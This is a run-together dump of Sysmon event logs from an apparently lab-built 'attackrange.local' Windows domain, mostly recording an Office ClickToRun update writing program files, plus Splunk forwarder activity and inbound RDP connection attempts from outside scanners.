Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\concrt140.dll2021-04-20 14:54:14.534 11241100x800000000000000064478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dll2021-04-20 14:54:14.534 11241100x800000000000000064477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL2021-04-20 14:54:14.471 11241100x800000000000000064476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\STSUPLD.DLL2021-04-20 14:54:14.471 11241100x800000000000000064475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\PPSLAX.DLL2021-04-20 14:54:14.471 11241100x800000000000000064474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\STSCOPY.DLL2021-04-20 14:54:14.471 11241100x800000000000000064473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OSFROAMINGPROXY.DLL2021-04-20 14:54:14.471 11241100x800000000000000064472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OSFPROXY.DLL2021-04-20 14:54:14.471 11241100x800000000000000064471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.471{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OWSCLT.DLL2021-04-20 14:54:14.471 11241100x800000000000000064470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:54:14.425 11241100x800000000000000064469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcp140.dll2021-04-20 14:54:14.425 11241100x800000000000000064468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:54:14.425 11241100x800000000000000064467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:54:14.393 11241100x800000000000000064466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.393{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:54:14.393 11241100x800000000000000064465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:54:14.378 11241100x800000000000000064464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:54:14.378 11241100x800000000000000064463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAME.DLL2021-04-20 14:54:14.378 11241100x800000000000000064462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.FileUtils.dll2021-04-20 14:54:14.378 11241100x800000000000000064461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.SqlDatabase.dll2021-04-20 14:54:14.378 11241100x800000000000000064460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.PasswordManager.dll2021-04-20 14:54:14.378 11241100x800000000000000064459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DcfMsoWrapper.dll2021-04-20 14:54:14.378 11241100x800000000000000064458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.MsoInterop.dll2021-04-20 14:54:14.378 11241100x800000000000000064457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:14.378{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe2021-04-20 14:54:14.362 23542300x800000000000000064456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.378{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7128CB0A0DA1019F8FF9460C586767F,SHA256=0B421D98B8042EE232F9F5FD68FA58AE9C155E68166A23E8FC9750F28E014F3D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:14.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE2021-04-20 14:54:14.362 11241100x800000000000000064454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ExcelServices.dll2021-04-20 14:54:14.362 11241100x800000000000000064453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DatabaseCore.dll2021-04-20 14:54:14.362 11241100x800000000000000064452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DatabaseServices.dll2021-04-20 14:54:14.362 11241100x800000000000000064451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Office.Interop.Access.dll2021-04-20 14:54:14.346 11241100x800000000000000064450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHEV.DLL2021-04-20 14:54:14.346 11241100x800000000000000064449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MINSBROAMINGPROXY.DLL2021-04-20 14:54:14.346 11241100x800000000000000064448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MINSBPROXY.DLL2021-04-20 14:54:14.346 11241100x800000000000000064447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Office.Interop.Access.dao.dll2021-04-20 14:54:14.346 11241100x800000000000000064446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Office.Interop.Excel.dll2021-04-20 14:54:14.346 11241100x800000000000000064445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SpreadsheetIQ.ExcelServices.dll2021-04-20 14:54:14.346 11241100x800000000000000064444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SkypeForBusinessBasic2019_eula.txt2021-04-20 14:54:14.346 11241100x800000000000000064443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\office.dll2021-04-20 14:54:14.331 11241100x800000000000000064442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Inquire.dll2021-04-20 14:54:14.331 11241100x800000000000000064441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DcfMsoWrapper.x86.dll2021-04-20 14:54:14.331 11241100x800000000000000064440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WordNaiveBayesCommandRanker.txt2021-04-20 14:54:14.331 11241100x800000000000000064439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SpreadsheetIQ.ExcelAddIn.dll2021-04-20 14:54:14.331 11241100x800000000000000064438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SpreadsheetIQ.Diagram.dll2021-04-20 14:54:14.331 11241100x800000000000000064437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:14.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE2021-04-20 14:54:14.331 11241100x800000000000000064436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Vbe.Interop.dll2021-04-20 14:54:14.331 23542300x800000000000000064435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:14.206{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D2C963354591433F4A0B699D74BCA47,SHA256=5847948325095442D8C6DB963C1ABB08BF19A5C41EFF6FC8B88E57865C54FE02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049479Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:14.510{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5046DBAC8B9B89B95B5C3C053D5F3F2,SHA256=28C2679CF4ABDCE6A3D6555EAB2654A85C7D7811CCE2DC87E078F8F631083095,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:12.561{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-27941-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:12.338{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com52235-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000064432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft.NET\ADOMD.NET\130\Microsoft.AnalysisServices.AdomdClient.dll2021-04-20 14:54:14.065 11241100x800000000000000064431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft SQL Server\130\Shared\msasxpress.dll2021-04-20 14:54:14.065 11241100x800000000000000064430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msolui.dll2021-04-20 14:54:14.065 11241100x800000000000000064429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:14.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8FR.DLL2021-04-20 14:54:14.065 354300x800000000000000049478Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:11.712{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52482-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 11241100x800000000000000064564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:15.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOHTMED.EXE2021-04-20 14:54:15.784 11241100x800000000000000064563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC32.DLL2021-04-20 14:54:15.768 11241100x800000000000000064562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:15.768{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OcPubMgr.exe2021-04-20 14:54:15.768 23542300x800000000000000064561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.518{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FD44071B2C8C0E40420089F11A5A734,SHA256=6B6675DB783DFABCB3DC6127585AF5BA017F41269E2DE116CAE8612BAB72F363,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ADAL.DLL2021-04-20 14:54:15.487 11241100x800000000000000064559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe2021-04-20 14:54:15.409 11241100x800000000000000064558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe2021-04-20 14:54:15.409 